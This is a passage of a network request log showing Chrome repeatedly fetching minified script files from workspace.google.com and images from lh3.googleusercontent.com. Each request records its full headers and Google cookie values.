cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/f1b5e532.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/f1b5e532.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/80078c6d.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/80078c6d.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/a9e19642.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/a9e19642.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/c64600aa.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/c64600aa.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/cd9c842e.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/cd9c842e.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/00adf923.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/00adf923.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/5e53e9e0.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/5e53e9e0.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/7a4d51ed.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/7a4d51ed.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/197ab810.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/197ab810.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/687e7157.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/687e7157.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/1c6fe6ad.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/1c6fe6ad.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/fb0914da.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/fb0914da.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/7ffa16ea.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/7ffa16ea.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/b59f5798.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/b59f5798.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/7ff80ebe.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/7ff80ebe.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/d0a0376a.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/d0a0376a.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/f8727730.min.js

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/f8727730.min.js HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
origin: https://workspace.google.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455 HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
